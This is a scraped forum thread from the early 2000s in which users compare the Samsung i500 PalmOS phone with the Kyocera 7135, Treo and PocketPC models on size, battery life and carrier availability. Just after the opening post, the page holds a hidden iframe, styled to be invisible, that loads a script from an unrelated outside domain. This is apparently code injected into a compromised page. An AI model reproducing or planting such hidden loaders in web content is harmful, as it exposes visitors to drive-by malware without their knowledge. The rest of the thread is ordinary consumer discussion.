+ Reply to Thread

Thread: i500 is Ideal?

i500 is Ideal?

The Samsung i500 seems to me like it is the ideal melding of cell phone and PDA technology. It is small and compact like a cell phone, but contains the full screen and grafiti abiltiies like a Palm. The unit has power to spare and yet recognizes that while most users are excited about convergence, it is the phone side that they are the most demanding of. After all, we get annoyed when our computer crashes, but an outage of the phone system can trigger a panic!

Yet, many critics are pointing to the Kyocera 7135, with a similar form factor and enhanced abilities and are saying "too little, too late." What do you think? Is the i500 the right way to go, or is it a day late and a dollar short?

<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I don't see how it could be considered late at all. Perhaps right on time by my calculations. Lets remember that the 300 was, perhaps, ahead of its time. How many hybrids of late have made your jaw drop as the 300 did when your eyes first fell upon its sleek design? Sure, the Kyocera has an MP3 player, but I think I'll go with the Samsung.

laxplayer003

kinda like the i700 better-no flip

whats the diff between the i500 and the i700...if it's just the flip issue....will prefer to wait for the i700.....like the i300 concept..no flip...

Thumbs up Leaning towards the I500

I agree that the 500 is becoming more and more attractive.

I have grown tired of waiting for the 7135, which isn't going to be out anytime soon from all the talk I've heard.

The I500 has everything I need, and I can survive without mp3. The I500 would be my 3rd Samsung phone (8500 & I300 resepectivly), and I have been very pleased with both.

So, if the I500 is out before the 7135, I will be a Samsung Owner yet again.

Kyo, you took too long!

Re: kinda like the i700 better-no flip

whats the diff between the i500 and the i700...
    The i500 is a PalmOS phone with full PDA capabilities. This means it is fast, light, and simple to use. It also means no MP3, no expansion, and PalmOS 4.1.

The i700 is a PocketPC phone with full PDA capabilities. This means it has a faster processor, power to spare, and PocketPC Phone Edition OS. It also means a lower battery life and compexity in use. And a non-folding form factor, as you mention.

Hope that is helpful. Both look like VERY interesting phones!

With each passing day, it seems more and more likely that I will be joining those on the I-500 bandwagon.

I'm handcuffed to Sprint for a variety of reasons I won't bore you with. It looks like there's no way of knowing when, or if, Sprint will have the Kyocera 7135.

I love the 6035 that I have now, but it's time for an upgrade to color.

I already have a perfectly good mp3 player, so I don't need one with my phone. The SD slot is just not enough of a draw for me to make it worth lugging around all that extra weight and thickness. (The 7135 is over an inch thick!)

Hopefully Samsung will be smart enough to get the I-500 out in the next few weeks. If they can they will certainly reap the Holiday season benefit that Kyocera is almost certain to miss out on.

The I-500 looks like a great product. It's smaller than either the 7135 or the Treo. It has a 66 mhz processor, OS 4.1 and is "vision compatible".

What's not to like?

I-300 Novice

Kyocera 7135 vs. Samsung I-500 Screen Size

I too do not care about the MP-3 function on the 7135....five questiong for those of you out there that may be beta testing the 7135 and/or I-500.

1. How do the usable dimensions of the screens compare?

2. How do the battery life on each of the units compare?

3. Which one will be easier to read in daylight?

4. Anyone have an educated guess on the availability of both phones?

5. How do the physical dimensions and weight compare?

I love the concept of the I-300 but can't stand not having actual phone dialing buttons and the battery life is terrible. I have taken my phone into Sprint and they have checked the charger, the batteries and the phone software and they say everything is fine. A few hours on standby and an hour or less of talk time doesn't make it with me.

Thanks in advance for the info.
    Ahmed V. Ismail
    A Smartphone Addict

Re: Kyocera 7135 vs. Samsung I-500 Screen Size

Originally posted by PHCismail
    I too do not care about the MP-3 function on the 7135....five questiong for those of you out there that may be beta testing the 7135 and/or I-500.

1. How do the usable dimensions of the screens compare?

2. How do the battery life on each of the units compare?

3. Which one will be easier to read in daylight?

4. Anyone have an educated guess on the availability of both phones?

5. How do the physical dimensions and weight compare?

I love the concept of the I-300 but can't stand not having actual phone dialing buttons and the battery life is terrible. I have taken my phone into Sprint and they have checked the charger, the batteries and the phone software and they say everything is fine. A few hours on standby and an hour or less of talk time doesn't make it with me.

Thanks in advance for the info.
    I am not a beta tester but here are some physical dimensions.

A500:

86mm * 50mm * 20mm

Source: http://www.samsungusa.com/cgi-bin/na...a500_specs.jsp

Multiply the inches with by 2.54cm then 10 to get the mm

I500:

87mm * 54mm * 21.5mm

Source: http://www.samsungelectronics.com/wo...tallMobile.asp

As you can see, the I500 is pretty small Not much bigger than the A500.

As for the release dates you can check this site out. Although, dont bet on it being 100% certain. Sometimes Cnet was a little slow with information.

http://reviews.cnet.com/wireless/0-1...0599935-1.html

Here are some pictures of the I500 from korea.

http://www.howardforums.com/showthre...highlight=i500

PocketPC Phone Edition...

I notice that we are entering the endless comparison arguments of treo vs Samsung vs Kyocera vs Palm vs Microsoft.

I am very interested in the Samsung i500, i600, and i700 that are all going to be here, real soon now...

One bit of caution, the i600 is the PocketPC version of the i500. It is a small, folding form factor. It runs PocketPC Phone Edition.

THis is not the same thing as PocketPC. Phone edition phones do NOT have handwriting recognition, all input is from the keypad... No touch screen. The apps include a browser, email, contacts, and the phone applications. It does not include pocket word, pocket excel, powerpoint viewer, etc.

The i700 is a pocket pc with phone support. It will have all of the pocket apps and a touch screen with handwriting recognition. It needs it so it can use the screen to draw the keypad.

imho: the i600 is an ideal form factor, but it needs the full OS support. It is a cell phone run by microsoft OS. The i700 is a full PocketPC , the PocketPC version of the i330. It is very similar to the Toshiba/Audiovox/T-Mobile PocketPC Smartphones, but runs on CDMA.

The i500 is a better choice only because it is faster than the i300, small form factor, and you can add any PalmOS application for word/excel/powerpoint functionality, and it has the grafitti input areas as well as a real keypad. It supports AMPS as well as both CDMA 800 and 1900 MHZ. It only needs a card slot.

i500 with Verizon?

Anyone know if the i500 will be offered on Verizon?

Bob

battery life

Anybody else concerned about battery life of the i500? The i300 had poor enough battery life with a 900 mAh Li-ion battery that Samsung included two. Yet the i500 has an 800 mAh battery! And the i330 has a 700 mAh battery! Presumably Samsung has learned something about how to conserve juice...but still these battery capacities don't inspire too much confidence. For comparison, the Treo 300 has an 1100 mAh battery. I haven't been able to figure out the capacity of the 7135 battery.

Re: PocketPC Phone Edition...

Originally posted by Smartphone Fan

One bit of caution, the i600 is the PocketPC version of the i500. It is a small, folding form factor. It runs PocketPC Phone Edition.

THis is not the same thing as PocketPC. Phone edition phones do NOT have handwriting recognition, all input is from the keypad... No touch screen. The apps include a browser, email, contacts, and the phone applications. It does not include pocket word, pocket excel, powerpoint viewer, etc.

The i700 is a pocket pc with phone support. It will have all of the pocket apps and a touch screen with handwriting recognition. It needs it so it can use the screen to draw the keypad.
    Small correction here: i600 is based on Microsoft SmartPhone 2002 and the i700 is based on Microsoft PocketPC Phone Edition. The SmartPhone 2002 is the limited OS without support for Pocketapps, and handwritting recognition without touch screen. The PocketPC Phone Edition is full Pocket OS with full pocket apps.

Sorry for the confusion.

I think Microsoft and Samsung is making a mistake here. the i600 would be awsome if it had full application support.

i500 is still the killer phone...

Had my i300 for a year and the battery life is fine for me. I change the batteries ocassionally just so the spare gets some use. I think that many folks find the battery fine. This won't hold me back from getting i500.

Richard

External Display (or lack thereof)!

The lack of an external display is a big oversight on the part of Samsung in my opinion. I like to be discreet when in a meeting and the phone vibrates and an external display allows you to see who is calling without drawing attention. With the i500 the phone vibrates and then I have to open it up to see who is calling. Can someone help me get over this external display hangup (no pun intended)!

Not having the external display may be tough to get used to for some.

That's the best thing about the increased competition on the horizon in the smartphone space. There are different products to satisfy different priorities.

I wanted to replace my Kyocera 6035 with the new model due out soon, the 7135. It does have external caller id, as do the Treo 300 and others.

For me it's not that big a deal. I used a Star Tac for years that was set on "any key answer" so that I would flip it open to view caller id before choosing whether or not to answer.

The important thing for me is that Samsung has built the smallest, lightest smartphone out there (when it's released of course).

It's got a faster processor and newer OS than the Treo or 7135. It's a full 2.2 oz lighter than the 7135, and nearly a 1/4 of an inch thinner.

You've got to give somewhere.

I agree

All these phones are compromises. The I-500 sounds very nice and should compete well with the 7135 (each has its diehard propoents).

I am thinking abou diversion vs. conversion. Having been a Kyo 6035 user since Day 1, I am now tending more towards a Bluetooth phone that can wirelessly connect to my Palm Tungsten T and PowerBook computer.

i300 knucklehead

Re: I agree

Originally posted by Varipapa
    All these phones are compromises. The I-500 sounds very nice and should compete well with the 7135 (each has its diehard propoents).

I am thinking abou diversion vs. conversion. Having been a Kyo 6035 user since Day 1, I am now tending more towards a Bluetooth phone that can wirelessly connect to my Palm Tungsten T and PowerBook computer.
    Have you come across ANY sprint phones that have bluetooth on board? I would love to see that some day. I played with the Tungsten at CC the other day and it blew me away.

Bluetooth unavailability on CDMA

The only CDMA/Bluetooth phone I know of is the Motorola 270 which was sold by Verizon in the past. This is a real bummer as I think the best phone combo at this point is to match a Palm Tungsten T with Bluetooth to a Bluetooth phone (and laptop too).

I don't expect much in Bluetooth availability until 2003.

Slickest combo presently is the Sony-Ericsson T68i (bluetooth/GSM) + Palm Tungsten T + Apple Powerbook with Bluetooth!

Thumbs up

Thanks to all of you for the info on the I500. I surf both the smartphonesource and sphi300 sites (I have a 6035/my husband has an I300), and I have really have had my heart set on the 7135. However, with the rumours spreading that Sprint might not carry it, it is GREAT to hear how wonderful the I500 will be.

Originally posted by pdxjayhawk

The important thing for me is that Samsung has built the smallest, lightest smartphone out there (when it's released of course).

It's got a faster processor and newer OS than the Treo or 7135. It's a full 2.2 oz lighter than the 7135, and nearly a 1/4 of an inch thinner.

You've got to give somewhere.
    Actually, both phones use the same Palm OS 4.1.